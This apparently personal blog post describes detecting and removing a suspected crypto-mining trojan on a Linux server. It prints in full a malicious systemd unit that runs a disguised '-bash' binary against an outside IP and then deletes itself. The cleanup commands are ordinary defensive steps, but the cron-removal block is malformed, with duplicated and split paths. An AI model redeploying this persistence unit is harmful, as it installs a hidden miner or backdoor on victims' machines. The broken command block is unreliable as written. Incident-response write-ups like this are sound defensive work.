记一次LINUX清除疑似挖矿木马的过程

原创 已于 2025-04-23 10:38:20 修改 · 362 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

于 2025-04-23 10:16:30 首次发布
     某天登录LINUX服务器,发现有几千次登录失败的记录,查看登录日志tail -200 /var/log/secure,发现不断有另一台内部机器在不断的换着用户尝试连接(就是暴力连接),在top查看服务器的资源使用情况,发现有一个-bash(伪装的名称)的程序,几乎占满了cpu资源。注:可以配置 Fail2ban 自动防御这种不断尝试攻击。
     
     日志文件的内容:

在这里插入图片描述
异常的程序:
2437691 opoopo 15 -5 2469616 24460 4 S 795.3 0.2 2:10.49 -bash
异常点​:
​1、极高的CPU占用(795.3%)​​
正常 bash 进程几乎不占用CPU,而此进程消耗近 ​8个核心的满载资源,极可能是挖矿木马或恶意脚本在运行。
2、进程名伪装为 -bash*
正常的交互式Shell会显示 -bash,但恶意程序常伪装成常见进程名(如 bash、sh、httpd)。
​进程号异常(PID 2437691)​​
高PID值可能表示进程是近期启动的(系统重启后PID会重置)。
​3、优先级异常(NI=-5)​​
优先级被调整为 -5(比普通进程更高),可能是攻击者人为设置的。
4、杀死进程后,又会自动重启,说明有守护进程。

排查步骤:

  1. 查看进程的完整命令行
sudo cat /proc/2437691/cmdline | tr '\0' ' '
  1. 定位进程所在路径
sudo ls -l /proc/2437691/exe

结果是:/proc/2437691/exe -> ‘/usr/bin/-bash (deleted)’,表明启动后被删除了,不是真实的路径。
3. 检查进程的子进程

pstree -aps 2437691  # 查看进程树
  1. 检查 /tmp/、/dev/shm/ 等临时目录下是否有异常程序,检查定时任务、检查检查恶意 systemd 服务中是否有异常程序。
sudo ls -la /tmp/ /dev/shm/ /var/tmp/
sudo find /tmp/ -name "*.sh" -o -name "*.elf" -o -name "*.so"
ll /etc/systemd/system/
ls -la /etc/cron.* /var/spool/cron/

发现有一个奇怪的程序:pwnrige.service

cat  pwnrige.service
[Unit]
Description=pwnrig

Wants=network.target
After=syslog.target network-online.target

[Service]
Type=forking
ExecStart=/bin/bash -c 'cp -f -r -- /bin/sysdr /bin/-bash 2>/dev/null && /bin/-bash -c  -ip 64.23.131.8 -dp 443 -tls  -dp 80 -dp 3
333 -p 443 -tls  -p 80 -p 3333 -k >/dev/null 2>&1 && rm -rf -- /bin/-bash 2>/dev/null'
Restart=always
KillMode=process

[Install]
WantedBy=multi-user.target

从文件内容来看,这是一个疑似高度恶意的 systemd 服务,其作用是持久化运行一个挖矿木马或后门程序,真实路径是:/bin/sysdr /bin/-bash,64.23.131.8这是一个美国IP,执行后删除自身,隐藏痕迹。
5. 删除这个服务,删除真实的程序
立即停止并删除服务​

sudo systemctl stop pwnrige.service
sudo systemctl disable pwnrige.service
sudo rm -f /etc/systemd/system/pwnrige.service
sudo systemctl daemon-reload

​终止恶意进程​# 查找所有名为 -bashsysdr 的进程

sudo pkill -f '/bin/-bash'
sudo pkill -f '/bin/sysdr'

​删除恶意文件​、服务

sudo rm -f /bin/sysdr /bin/-bash
sudo rm -f /etc/systemd/system/pwnrige.service
sudo rm -f /etc/cron.d/pwnrig \

chattr -ia /etc/cron.d/pwnrig \
/etc/cron.hourly/pwnrig \
/etc/cron.daily/pwnrig \
/etc/cron.weekly/pwnrig \
/etc/cron.monthly/pwnrig
/et
c/cron.hourly/pwnrig \
/etc/cron.daily/pwnrig \
/etc/cron.weekly/pwnrig \
/etc/cron.monthly/pwnrig

这里有可能删除不掉,报不允许的操作。
需要检查文件属性:

lsattr /etc/systemd/system/pwnrige.service

解除锁定,如果输出包含 i(不可修改)或 a(仅追加)等属性,需先解除锁定。

sudo chattr -ia /etc/systemd/system/pwnrige.service

6、检查其他感染痕迹
检查定时任务​:

crontab -l
sudo ls -la /etc/cron.*

​检查网络连接​:

sudo netstat -tunlp | grep -E '64.23.131.8'

​全盘扫描恶意文件​:

sudo find / -name "sysdr" -o -name "*-bash" -mtime -30

​5. 封禁恶意IP​

sudo iptables -A INPUT -s 64.23.131.8 -j DROP
sudo firewall-cmd --add-rich-rule='rule family="ipv4" source address="64.23.131.8" reject' --permanent
sudo firewall-cmd --reload

​重新安装被篡改的工具:

sudo apt reinstall bash coreutils -y  # Debian/Ubuntu
sudo yum reinstall bash coreutils -y  # RHEL/CentOS

扫描 Rootkit:

sudo rkhunter --check

最后说一句,还是要管好服务器,严禁使用ROOT用户来安装各类软件,严禁使用非官方的软件插件,从源头管起。

oO眸眸Oo
关注
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
一次linux挖矿木马的处置
beichenyyds的博客
09-15 5203
linux服务器挖矿木马处置
分析teamTNT团队Linux挖矿木马执行过程与防范
欢迎访问胡宝全的博客
09-20 1716
分析teamTNT团队Linux挖矿木马执行过程与防范 公司需要扩展海外业务,需要有一台海外云服务器。当我们把应用部署上去时的第二天所有应用down掉了,然后发现ssh连接服务器特别慢。好不容易连接上了执行一下free -h 发现内存占用99%,反手一个top,等了大约2分钟出来结果。 问题排查 查看当前内存:free -h 发现内存占用几乎达到98%。 查看当前进程:top等了大约2分钟出来结果。竟然有7000多个tasks,load average: 459.78, 584.52, 387.07,这明
挖矿木马-Linux
最新发布
山兔的博客
09-09 1148
1、挖矿木马靶机中切换至root用户执行/root目录下的start.sh和attack.sh2、题目服务器中包含两个应用场景,redis服务和hpMyAdmin服务,黑客分别通过两场景进行入侵,入侵与后续利用线路路如下:redis服务:redis服务监听地址为0.0.0.0,且使用root户运行,黑客通过对外开放的redis服务,向/root/.ssh/authorized_keys⽂文件下写入自己的公钥从而获得服务器ssh服务的root连接权限;
警惕:能够删除杀毒软件的新型Linux挖矿***来袭
weixin_34005042的博客
11-28 317
如今,网络犯罪分子用来获取非法收入的最常见手段之一,就是在不经过设备所有者同意的情况下使用CPU或GPU资源来进行隐蔽的加密货币挖掘操作。这不,来自俄罗斯网络安全公司Doctor Web的研究人员在近日就发现了一款旨在感染Linux设备的加密货币挖矿恶意软件。值得注意的是,这款恶意软件不仅还会感染处于受感染设备同一网络下的其他联网设备,而且还会删除正在运行的杀毒软件。该恶...
应急响应:挖矿木马-实战 案例一.【Linux 系统-排查和删除】
网络安全领域___专研者.
08-18 1557
挖矿病毒是一种恶意软件,它在用户不知情的情况下利用用户的计算机资源进行虚拟货币挖矿,从而获取利益。这种病毒的传播方式多样,包括通过垃圾邮件、软件捆绑、系统漏洞以及网页脚本等途径 。
Linux中招挖矿木马如何处置,附带解决方案
是故事啊~关注我~
01-25 7612
前段时间一位朋友在群里反应,公司的部署大数据集群的Linux服务器中了挖矿木马病毒,让我给他解决,分享一下解决方法。 一. 什么是挖矿木马 首先经过多年的演进,越来越多的挖矿木马利用多种方式入侵系统,意图感染更多的机器,提高挖矿的效率和收益,其中主要入侵方式如下: 1. 漏洞利用:利用系统漏洞快速获取相关服务器权限,植入挖矿木马是目前最为普遍的传播方式之一。常见的漏洞包括Windows系统漏洞、服务器组件插件漏洞、中间件漏洞、web漏洞等。 部分攻击者选择直接利用永恒之蓝...
3、应急响应-挖矿病毒脚本检测与清除&样本定性&入口修复
m0_65842464的博客
01-25 2278
Virustotal 深信服威胁情报中⼼, 微步在线 ,venuseye, 安恒威胁情报中⼼ ,360威胁情报中⼼, 绿盟威胁情报中⼼, AlienVault ,RedQueen安全智能服务平台, IBM X-Force Exchange ,ThreatMiner。
Linux应急响应思路和技巧(一):进程分析篇
WangsuSecurity的博客
05-27 2113
本文总结自网宿安全演武实验室安全应急响应团队日常工作实践
应急响应——Linux入侵排查
negnegil的博客
09-16 9329
事件响应可以定义为每当发生计算机或网络安全事件时所采取的行动过程。作为事件响应者,您应该始终了解系统中应该出现和不应该出现的内容。 排查思路 (1)首先监测用户账号安全,比如新增的账号、可疑账号,重点查看可以远程登录的账号以及高权限账号。 (2)利用linux的history指令查看历史linux指令,uptime指令查看登录多久、多少用户。 (3)检查异常端口和进程,netstat检查异常端口,ps检查异常进程,可以观看资源占用的进程id来判断是否有挖矿木马等嫌疑。 (4)检查linux的启动项和系统的
Linux恶意软件防护指南:识别、清除与预防策略
[Linux恶意软件防护指南:识别、清除与预防策略](https://www.endace.com/assets/images/learn/packet-capture/Packet-Capture-diagram%203.png) # 1. Linux恶意软件概述 在数字时代,Linux系统的普及程度越来越高...
应急响应——Linux挖矿木马处置
记录并分享学习安全的知识点..
12-01 1046
挖矿会带来大量的计算资源消耗,成本过于高昂,这就使一些不法分子通过各种手段将矿机程序植入到受害者的计算机中,利用受害者的计算机资源进行计算,从而获取非法收益。挖矿木马为了使用更多的计算资源,一般会通过对全网进行漏洞扫描、SSH爆破等攻击手段。部分挖矿木马具有横向传播的特点,会在成功入侵一台主机后,对处在同一个内网的其他主机进行横向渗透,以此来获得长期巨大而计算资源。
Linux运维之解决服务器挖矿木马问题
上善若泪
01-25 2053
挖矿木马会占用CPU进行超频运算,从而占用主机大量的CPU资源,严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源,一般都会对全网进行无差别扫描,同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点,在主机被成功入侵之后,挖矿木马还会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。
一次Linux中的木马病毒解决经历,附超全教程文档
2401_84248479的博客
04-11 994
既然入侵6379端口,就怀疑是通过我的Redis服务进入的我的系统,因为我的Redis服务是在公网可以访问的,于是关闭了Redis服务的远程访问,重启服务器,之后就正常了,但是过了有半个小时发现CPU又100%了.又正常了,又过了半小时又CPU100%,这个时候想到肯定是有定时器或者开机自启的服务,通过ps查看,杀死的两个进程又有了…从进程列表中发现了两个不正常的进程都是newinit.sh,我是没有这样的一个脚本的,所以一定是这个进程惹的祸。
Systemd使用总结
超人的专栏
01-31 4678
systemd是一系列工具的集合,提供了一个系统和服务管理器,运行为 PID 1 并负责启动其它程序。其作用也远远不仅是启动操作系统,它还接管了后台服务、结束、状态查询、以及日志归档、设备管理、电源管理、定时任务等许多职责,并支持通过特定事件和特定端口触发的on-demand任务。unit表示不同类型的systemd对象,通过配置文件进行标识和配置;文件中主要包含了系统服务、监听socket、保存的系统快照以及其它与init相关的信息。
一文搞懂容器运行时 Containerd
因上努力,果上随缘。但行好事,莫问前程。
08-02 3736
在学习Containerd之前我们有必要对Docker的发展历史做一个简单的回顾,因为这里面牵涉到的组件实战是有点多,有很多我们会经常听到,但是不清楚这些组件到底是干什么用的,比如、runc、containerd、CRI、OCI等等。...
安全应急:解决无法删除挖矿病毒-bash和sysdrr等文件_应急dw
2401_84263262的博客
04-11 770
又是套娃下载:​2)找不到-bash的原因上面的脚本将/bin/initdr拷贝到/bin/-bash,执行他后删除,并且所有的操作都将操作录写给了null,隐藏了他在系统内的踪迹,更加确定了我的想法,绝壁是被当矿机了。我们用vim打开这个sysdrr文件,发现里面全是乱码,说明这还不是一个简单的文本脚本文件。grep -r 命令的使用也比较简单,只需在命令行中输入grep -r 后面加上要搜索的字符就可以完成搜索,例如:grep -r ‘hello’ 就可以搜索文件中包含hello字符的文件。
Linux-Systemd服务配置文件详解
热门推荐
正月十六工作室
10-26 1万+
【转载】 原文链接 一、开机启动 对于那些支持 Systemd 的软件,安装的时候,会自动在/usr/lib/systemd/system目录添加一个配置文件。 如果你想让该软件开机启动,就执行下面的命令(以httpd.service为例)。 $ sudo systemctl enable httpd 上面的命令相当于在/etc/systemd/system目录添加一个符号链接,指向/usr/lib/systemd/system里面的httpd.service文件。 这是因为开机时,Systemd只执行/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值